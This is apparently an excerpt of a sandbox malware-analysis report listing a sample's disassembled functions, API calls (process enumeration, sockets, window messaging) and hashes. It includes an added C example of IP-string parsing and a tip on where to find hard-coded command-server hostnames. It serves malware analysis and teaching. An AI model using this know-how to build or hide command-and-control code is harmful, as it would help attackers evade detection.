• Opcode ID: 16321a9fd7bd9801b19df295905235d8ee3c891b09e23fd61e05898253a96921
• Instruction ID: a669bf3cd1eb390430b8bf8db729996227bb3181aae1798f364b776fc049f020
• Opcode Fuzzy Hash: 16321a9fd7bd9801b19df295905235d8ee3c891b09e23fd61e05898253a96921
• Instruction Fuzzy Hash: 3541D4B120430A9FD720DF24DA85B7AB7E8EF85714F148A1DF6A9972D1C730E904CB52
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A2DCD0,00000000,?,?,?,?), ref: 00A24F48
• GetWindowLongW.USER32 ref: 00A24F65
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A24F75
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: 37ca7d53f0c9a7c8699fe7098a7f416f91f455ea8da4e095a8da9e629149c6f2
• Instruction ID: 6501fe151c9ea4c40440bcf92e1c6da8c67bdc40e8cf6189777a334ff1de2c00
• Opcode Fuzzy Hash: 37ca7d53f0c9a7c8699fe7098a7f416f91f455ea8da4e095a8da9e629149c6f2
• Instruction Fuzzy Hash: D7319C31214215AFEB208F7CEC45BEA7BA9EB48734F214724F979A21E0DB70AC519B50
APIs
  • Part of subcall function 00A13DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00A13AD4,?,?), ref: 00A13DD5
• inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A13AD7
• _wcslen.LIBCMT ref: 00A13AF8
• htons.WSOCK32(00000000,?,?,00000000), ref: 00A13B63
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ByteCharMultiWide_wcslenhtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 946324512-2422070025
• Opcode ID: 253edb67f80199cdede52c778db1a2d1352527b24dbf07bcda50cba48f5e23ac
• Instruction ID: 92186137b5983f46eb425fd3033a7a6fa681631a7b9cde6255ff85c870bc6068
• Opcode Fuzzy Hash: 253edb67f80199cdede52c778db1a2d1352527b24dbf07bcda50cba48f5e23ac
• Instruction Fuzzy Hash: 4231A17A60C2019FCF10CF68C585EE97BB1EF55324F248199E8168B392E771EE86C760
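The combination of WideCharToMultiByte, inet_addr, htons and the literal string 255.255.255.255 in the function above is the classic host-string parsing idiom: inet_addr returns INADDR_NONE (0xFFFFFFFF) both for an unparseable string and for the limited-broadcast address, so code that wants to fall back to name resolution on failure has to compare the input against "255.255.255.255" before deciding. The example below is added here to illustrate that idiom in isolation; it is not code recovered from the sample, it makes no claim about what the sample does with the address beyond the listed calls, and it uses the POSIX inet_addr/htons (the WSOCK32 exports behave the same way) with constructed inputs.

```c
/* Added example: the INADDR_NONE ambiguity behind an inet_addr / htons /
 * "255.255.255.255" API combination. Not code from the analysed sample. */
#include <arpa/inet.h>   /* inet_addr, htons, htonl, INADDR_NONE (same semantics as WSOCK32) */
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Naive check: wrongly reports the broadcast address as "not a literal",
 * because inet_addr() returns INADDR_NONE for both an invalid string and
 * 255.255.255.255. */
int naive_is_ipv4_literal(const char *s, uint32_t *net_order) {
    uint32_t a = inet_addr(s);
    if (a == INADDR_NONE)
        return 0;
    *net_order = a;
    return 1;
}

/* Disambiguated check: INADDR_NONE means "treat as hostname and resolve"
 * only when the string is not literally 255.255.255.255. */
int is_ipv4_literal(const char *s, uint32_t *net_order) {
    uint32_t a = inet_addr(s);
    if (a == INADDR_NONE && strcmp(s, "255.255.255.255") != 0)
        return 0;
    *net_order = a;
    return 1;
}

/* Fill a sockaddr_in the way a connect() caller would: the inet_addr()
 * result is already in network byte order, the port goes through htons().
 * Returns 0 when the host string must be resolved by name first. */
int build_sockaddr(const char *host, uint16_t port, struct sockaddr_in *sa) {
    uint32_t a;
    if (!is_ipv4_literal(host, &a))
        return 0;
    memset(sa, 0, sizeof *sa);
    sa->sin_family = AF_INET;
    sa->sin_addr.s_addr = a;
    sa->sin_port = htons(port);
    return 1;
}

int main(void) {
    /* Constructed inputs for illustration; not values taken from the report. */
    const char *inputs[] = { "192.0.2.10", "255.255.255.255", "c2.example.invalid" };
    for (int i = 0; i < 3; i++) {
        uint32_t a = 0;
        printf("%-20s naive=%d fixed=%d\n", inputs[i],
               naive_is_ipv4_literal(inputs[i], &a),
               is_ipv4_literal(inputs[i], &a));
    }
    return 0;
}
```

When reversing a function that matches this API pattern, the branch taken after the string comparison is usually where the name-resolution path (gethostbyname or getaddrinfo) lives, which is the spot to look for hard-coded C2 hostnames.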
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A249DC
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A249F0
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00A24A14
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                  • Opcode ID: b10b5f665623a98816ce2cf3eb0038d599b7e24c1b2283996494b85f2dd013c3
                                                                                                                                                                                                                                  • Instruction ID: 43a2a88363d134aaeee38dc8e229b31cfd8c80556c9f49f4305f6635d6940d89
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b10b5f665623a98816ce2cf3eb0038d599b7e24c1b2283996494b85f2dd013c3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C521BF32610229BBDF11CF98DC42FEB3B79EF48714F110224FE156B190DAB5E8969B90
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A251A3
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A251B1
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A251B8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
• Opcode ID: a470ff1afdf09049e855a1ae4299b92a49751600c351b5c9be8f1f0a83b02e25
• Instruction ID: 1729ee8d76b62aea9a4f9e5525a7823415d30844b87d04893ac82da8c3fd4925
• Opcode Fuzzy Hash: a470ff1afdf09049e855a1ae4299b92a49751600c351b5c9be8f1f0a83b02e25
• Instruction Fuzzy Hash: CE2151B5600659AFDB10DF68DC81EB637ADFF9A364B040159F90497361CB70EC52CBA0
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A242DC
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A242EC
• MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A24312
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: 5bd38fa6efa6fe0c782b5b91b1e3f57eedab85ed387d95c7f46fae6dd7c68854
• Instruction ID: ad4c807e81c08227dfc38a31640290858610b5f01d82ac7b1752a913512260e4
• Opcode Fuzzy Hash: 5bd38fa6efa6fe0c782b5b91b1e3f57eedab85ed387d95c7f46fae6dd7c68854
• Instruction Fuzzy Hash: DC217F32614128BBEB11CF99DC85FEB3B6EEB89754F118124F9059B190CA759C528BA0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00A0544D
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A054A1
• SetErrorMode.KERNEL32(00000000,?,?,00A2DCD0), ref: 00A05515
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• API String ID: 2507767853-685833217
• Opcode ID: 2bae53a596e7dd2560053fe6826e50a887705b9fe0202d6e1dc6c282e7804fd4
• Instruction ID: ea5c51cd0af04be989d9b0b24f629ec0d7505a1ca0419677945b2d6518e314c0
• Opcode Fuzzy Hash: 2bae53a596e7dd2560053fe6826e50a887705b9fe0202d6e1dc6c282e7804fd4
• Instruction Fuzzy Hash: 10316170A00208AFDB10DF68D885EAA77F9EF45304F1440A5F909DB262DB71EE46CB61
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A24CED
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A24D02
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A24D0F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: 6d8f3f7bb036dd0b20ec94abee75258d14e1ee4b125bb3c2b1f6f5bb09fd86aa
• Instruction ID: 40c2e243135391180b3f4ba4c69c2c3e70e1efd32dfcfd5bbb5589399db7f3a1
• Opcode Fuzzy Hash: 6d8f3f7bb036dd0b20ec94abee75258d14e1ee4b125bb3c2b1f6f5bb09fd86aa
• Instruction Fuzzy Hash: 32110271240258BEEF219F6DDC06FAB3BACEF89B64F110524FE55E20A0C671DC619B20
APIs
  • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
  • Part of subcall function 009F36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 009F3712
  • Part of subcall function 009F36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 009F3723
  • Part of subcall function 009F36F4: GetCurrentThreadId.KERNEL32 ref: 009F372A
  • Part of subcall function 009F36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 009F3731
• GetFocus.USER32 ref: 009F38C4
  • Part of subcall function 009F373B: GetParent.USER32(00000000), ref: 009F3746
• GetClassNameW.USER32(?,?,00000100), ref: 009F390F
• EnumChildWindows.USER32(?,009F3987), ref: 009F3937
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                  • String ID: %s%d
                                                                                                                                                                                                                                  • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                  • Opcode ID: bbc92d7a70612588f6f5d38eeb0780fbb6c777b796b661ea3410654e14eb186a
                                                                                                                                                                                                                                  • Instruction ID: 0d0949fdea39e28d7049bf9befb4ce2b79969eee7d5a765cd9ac8a49402d0ac5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbc92d7a70612588f6f5d38eeb0780fbb6c777b796b661ea3410654e14eb186a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2711A871600209ABDF11BF749C85BFE77AAAFD4304F048079BE199B252DE74594ACB20
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A26360
                                                                                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A2638D
                                                                                                                                                                                                                                  • DrawMenuBar.USER32(?), ref: 00A2639C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                  • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                  • Opcode ID: c21e152e21fc1fa823964061c6af6adeddad210db822f70ee9d0f6d470ca41a5
                                                                                                                                                                                                                                  • Instruction ID: 6322533461e8799d32f0402ce4ab433cab7f1e2c939e578b4427e1dc3e96fc4a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c21e152e21fc1fa823964061c6af6adeddad210db822f70ee9d0f6d470ca41a5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1801C031504228AFDB24DF58EC84BEE7BB4FF84314F1080A9E809DA150CB308A82EF20
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b971fbe1adb0777ae8110ee1eba588744e7bd8ac2982c2f49a5c80cc02705b02
                                                                                                                                                                                                                                  • Instruction ID: d4674ac7c693f898c5763bc656dabd2c37573416d3ac26c5a7adf4ff62b27da5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b971fbe1adb0777ae8110ee1eba588744e7bd8ac2982c2f49a5c80cc02705b02
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32C12C75A0021AEFDB14CF94C894ABEB7B9FF88714F148598E6059B252D731EE41CB90
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                  • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                  • Instruction ID: 568d592a61af1cae3546cce5d8bca3b8cbef009241f6060e27849f0b3a42a3e1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42A16A71F003869FEB15CF18C8A1FAEBBE8EF91314F2441ADE9959B291C2389D41C752
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A30BD4,?), ref: 009F0EE0
                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A30BD4,?), ref: 009F0EF8
                                                                                                                                                                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00A2DCE0,000000FF,?,00000000,00000800,00000000,?,00A30BD4,?), ref: 009F0F1D
                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 009F0F3E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 314563124-0
                                                                                                                                                                                                                                  • Opcode ID: f10eb0d7620bac7ece07b5fcc5095b1be9612ba53c501042b5ffee7e6e8dab46
                                                                                                                                                                                                                                  • Instruction ID: bfda219639fc3137086103a1f664d3c94eff68244aca3ce63544f9a3048c6dbb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f10eb0d7620bac7ece07b5fcc5095b1be9612ba53c501042b5ffee7e6e8dab46
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF81F975A00109EFCB14DF98C984EEEB7B9FF89315F204558F606AB251DB71AE06CB60
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00A1B10C
                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00A1B11A
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
• Process32NextW.KERNEL32(00000000,?), ref: 00A1B1FC
• CloseHandle.KERNEL32(00000000), ref: 00A1B20B
  • Part of subcall function 009AE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,009D4D73,?), ref: 009AE395
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
• String ID:
• API String ID: 1991900642-0
• Opcode ID: 5df6f655b9cc24142285510bdc038962730c0d42e391aeff7ad998f850266b3b
• Instruction ID: b1fc4b82068acabfde338ea2dd9f7e06212739d52362134269f99544f9e3674d
• Opcode Fuzzy Hash: 5df6f655b9cc24142285510bdc038962730c0d42e391aeff7ad998f850266b3b
• Instruction Fuzzy Hash: 50512DB1508300AFD710EF68D886AABBBE8FFC9754F40491DF58997251DB70D905CB92
APIs
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 732198b89db175b42e7b9742f2605c1ec2197193fddfb878085c603f5ef24816
• Instruction ID: 815efc633133b6251f15be4f24d0c4dc89c01e5a60ad3234704789d24c539908
• Opcode Fuzzy Hash: 732198b89db175b42e7b9742f2605c1ec2197193fddfb878085c603f5ef24816
• Instruction Fuzzy Hash: BA411B33A80104BBDB21AFFD9C85BBE36A9EF85330F14862BF814D73A1DA3549415662
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00A1255A
• WSAGetLastError.WSOCK32 ref: 00A12568
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A125E7
• WSAGetLastError.WSOCK32 ref: 00A125F1
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
• Opcode ID: f1c50c04e8b4b616d5dc330e7c586b09b0803c143a7ec8a287dde3e69654dd08
• Instruction ID: aea37c98cd29840e4d782f044a6ee9d82eb2df487ac7eeeb013e6089da96fd83
• Opcode Fuzzy Hash: f1c50c04e8b4b616d5dc330e7c586b09b0803c143a7ec8a287dde3e69654dd08
• Instruction Fuzzy Hash: FA41D374A00200AFEB20EF28C886F6677E5EB44758F54C458F9598F2D3D772ED828B90
APIs
• GetWindowRect.USER32(?,?), ref: 00A26D1A
• ScreenToClient.USER32(?,?), ref: 00A26D4D
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00A26DBA
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
